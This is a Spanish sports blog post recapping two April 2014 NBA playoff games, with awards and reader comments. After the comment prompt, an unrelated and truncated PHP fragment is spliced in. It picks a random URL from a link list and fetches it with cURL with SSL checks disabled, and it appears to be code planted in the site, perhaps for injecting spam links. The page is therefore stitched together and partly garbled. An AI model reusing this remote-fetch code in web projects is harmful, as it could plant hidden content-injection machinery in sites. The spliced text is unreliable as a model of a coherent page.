La Crónica: La fuerza del oso

22 de April de 2014 por Simon

Si algo teníamos claro en las eliminatorias del Oeste es que en la mayoría de ellas iba a imperar la igualdad y así está siendo. Las dos únicas series que han disputado su segundo partido están empatadas a 1 aunque con un guión muy distinto.

Los Grizzlies demostraron ayer que ese séptimo puesto no es su lugar natural en la conferencia y que son un equipo mucho más potente de lo que su récord muestra. Tras un mal primer partido en el que Oklahoma fue claramente superior ha llegado un segundo partido que cambia completamente el panorama de la serie. El de ayer fue un auténtico partidazo en el que ambos equipos jugaron a muy buen nivel pero que Memphis dominó desde el salto inicial imponiendo su juego interior sobre el de los Thunder con un Zach Randolph imperial. Tony Allen (esta vez sí) consiguió molestar a Kevin Durant obligándole a tirar mucho más para llegar a sus cifras habituales de anotación. Con este panorama se podría pensar que Memphis ganó fácil el encuentro pero lo cierto es que aunque dispusieron de varias ventajas importantes, Oklahoma, gracias a los momentos de genialidad de Durant y Westbrook, volvía siempre a engancharse al partido. Increíble el final de tiempo regular que vivimos cuando faltaban 13 segundos y los visitantes ganaban de 5 puntos: Durant conectó un 3+1 impresionante desde la esquina, Allen falló uno de los tiros libres y los Thunder se encontraron con la oportunidad de empatar o ganar el partido. En la última jugada del tiempo reglamentario, la buena defensa de Memphis no permitió recibir en buena posición a Durant y tuvo que ser Westbrook el que buscara el triple a la desesperada. Falló pero el rebote lo recogió el que nadie se esperaba, el que durante toda la jugada había sido ignorado por todo el mundo, Kendrick Perkins, que anotó sobre la bocina contra el tablero y forzó la prórroga. En la prórroga el guión del partido continuó siendo el mismo pero Durant y compañía ya habían agotado el cupo de milagros de la noche por lo que Memphis se hizo con la victoria y la ventaja de campo (111-105). 

Otra serie que está empatada tras la jornada de ayer es la que enfrenta a Clippers y Warriors. En el primer partido, todo lo que le podía salir mal a los Clippers les salió mal lo que les obligaba a no fallar en el segundo si no querían despedirse de la lucha por el título a las primeras de cambio. Con esa idea salieron los locales, a tratar de reivindicarse y llevarse el segundo partido sin apuros. Griffin fue el gran protagonista del partido. Sin problemas de faltas confirmó lo que apuntaba en los pocos minutos que pudo disfrutar el otro día, que no hay nadie en los Warriors que pueda pararlo. La segunda unidad de Doc Rivers también se reivindicó y dieron su mejor nivel para despejar dudas. También cabe decir que los Warriors ni se presentaron, dio la sensación de que salieron a cumplir el expediente y a no desgastarse demasiado pensando en los dos partidos seguidos que disputarán ahora en su casa y que de ganarlos pueden dejar decidida la serie. Es algo demasiado habitual ver a algunos equipos que ganan el primer partido a domicilio y se dejan llevar en el segundo pensando en defender la ventaja de campo en casa. Con todos estos ingredientes el resultado no podía ser otro que una contundente paliza de los Clippers en un partido que tuvo aproximadamente 40 minutos de la basura (98-138).

A pesar de estar disputándose las eliminatorias por el título, la maquinaria de la liga no para y es tiempo de que la liga empiece a anunciar los premios individuales de la temporada. Ayer se anuncio el primero, Joakim Noah ha sido elegido como “mejor defensor de la temporada”. Por su parte, los Knicks anunciaron el esperado despido de Mike Woodson. Sin duda ambas cosas merecidísimas y ganadas a pulso. Para finalizar, Rick Aldeman ha anunciado que se retira. Los Wolves se enfrentan a un importante decisión. ¿Quién le sustituirá?

PREMIOS

MVP: Exhibición de Blake Griffin ante los Warriors. Espoleado por la derrota el día anterior el ala-pívot de los Clippers se fue a los 35 puntos y 6 rebotes en solo 30 minutos de juego.

Sorpresa: Tony Allen es el alma de estos Grizzlies y su aportación va más allá de unos números que no son malos: 8 puntos, 8 rebotes, 3 asistencias y 4 robos. Hedo Turkoglu aprovechó los minutos de la basura para anotar 13 puntos.

Decepción: Después de jugar un enorme partido hace dos días, los Warriors fueron un juguete en manos de los Clippers.

Esfuerzo en vano: Kevin Durant anotó 36 puntos y capturó 11 rebotes y Russell Westbrook consiguió 29 puntos, 8 asistencias y 7 rebotes pero los Thunder cayeron en la prórroga. A veces hay que dar el 110% de uno mismo para llevarse un partido de playoffs.

 

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Esteban dice:
    #1

    cuanto daño le hacen y les han hecho zach y marc al thunder! y eso que supuestamente tienen dos especialistas defensivos alli abajo como Perkins e Ibaka, imaginen los que les harían los grizzlies se se cruzaran con los warriors o los mavs?

    Iba a comentar lo mismo respecto de los Warriors, parece que el trabajo ya lo habian hecho ganando el primer partido y que daban por sentado que este se perdería, allá ellos, se tendrán confianza de local, pero esta claro que deben buscar alguna solucion para el caso de griffin, David Lee es de los peores 4 defensores de toda la liga, mas minutos para Barnes y Green en ese sector, sino sera un picnic

      Citar

  2. TheDeerHunter dice:
    #2

    Impresionantes los Grizzlies. Es difícil reprochar nada a ese equipo, pase lo que pase.
    Llama la atención lo de Tony Allen, que durante esta regular parecía que había perdido bastante peso específico en este equipo. Udrih siempre me ha parecido un base suplente cojonudo. Tengo mis dudas si no habrán salido ganando con el asunto Calathes.
    Después, lo de Zach y el rebote ofensivo es algo que roza lo paranormal. El hombre no es que tenga un salto brutal… pero los toca todos. Parece que le van a él.
    Demasiada suerte tuvieron los Thunder de llegar a la prórroga. ¿Quién decia que Kedrick Perkins no era decisivo? XD XD XD

      Citar

  3. rumbero dice:
    #3

    Absolutamente brutal el 3+1 de Durant. Por cosas así igual vemos durante la serie a unos Grizzlies dominando gran parte de los partidos y teniéndolos que jugar hasta el último segundo para ganar. Soberbios casi todos los osos con mención especial para Z-Bo y Allen.
    A todo esto (y aprovechando para felicitar a Noah por su DPOY, merecidísimo) ¿no os parece que Ibaka es cada vez mejor defensor y que en cambio cada año baja posiciones en el premio? ¿Es mejor DeAndre que él? Igual es porque ya no mete tantos tapones…:D

      Citar

  4. Esteban dice:
    #4

    no es por nada pero IBAKA baja de posiciones por que nunca ha llegado a ser lo que se espera de el

    piensese que el dinero del sueldo de Harden fue para Ibaka, hay Presti

      Citar

  5. Ruxixon dice:
    #5

    Corbin de Utah despedido………………….

    y Popovich,que no puede compartir línea con nadie,COY.Enhorabuena Pop,que sabemos que nos lees! xD

      Citar

  6. Denise dice:
    #6

    Los Jazz han destituido al merluzo de Tyrone Corbin. Gran noticia para la franquicia mormona el despedir a este inepto que con un equipo en reconstrucción le daba minutadas a Marvin Williams, Jefferson y algunas veces hasta a Biedrins.
    Rudy Gobert debe estar ahora mismo con un par de strippers celebrando la destitución del merluzo. A poco que llegue un entrenador con algo de luces, Gobert no debería bajar de los 24 minutos y el año que viene lo postularía como un gran candidato al MIP.

      Citar

  7. Esteban dice:
    #7

    Denise:
    Los Jazz han destituido al merluzo de Tyrone Corbin. Gran noticia para la franquicia mormona el despedir a este inepto que con un equipo en reconstrucción le daba minutadas a Marvin Williams, Jefferson y algunas veces hasta a Biedrins.

    Lamento disentir, hacer crecer a los jovenes no significa ponerlos a todos juntos para que se coman palizas de 50 puntos todas las noches
    las inclusiones de Williams y Jefferson, fueron positivas, no solo con ellos fueron mas competitivos, sino que ambos tuvieron una temporada por encima de los esperado

    yo creo que darle minutos a los jovenes para que se desarrollen, solo tiene sentido y resultados cuando se hace en el marco de un equipo competitivo o que al menos lo intenta

    hemos visto casi una decada de los Clippers poniendo a todos y cada unas de sus selecciones juntas en cancha para que se desarrollen y vimos que a causa del pesimo nivel general buenos jugadores se dejaban llevar y nunca daban un paso al frente

    Si el Jazz puede hacerse de Parker o Wiggins, este mercado con tanto espacio salarial que tendran, deberian intentar fichar algun jugador de cierto nivel para pensar en PO, de lo contrario, burke, Hayward, Kanter, Favors y Burks terminaran jugando para hacer sus numeros y conseguir un contrato en otro sitio

      Citar

  8. Lucho dice:
    #8

    Coincido con esteban

      Citar

  9. Ekos dice:
    #9

    Nadie odia a Tim porque no tiren a un séquito de fanboys detrás como muchas otras estrellas, entre otras razones.

      Citar

  10. Ekos dice:
    #10

    Tiene*

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>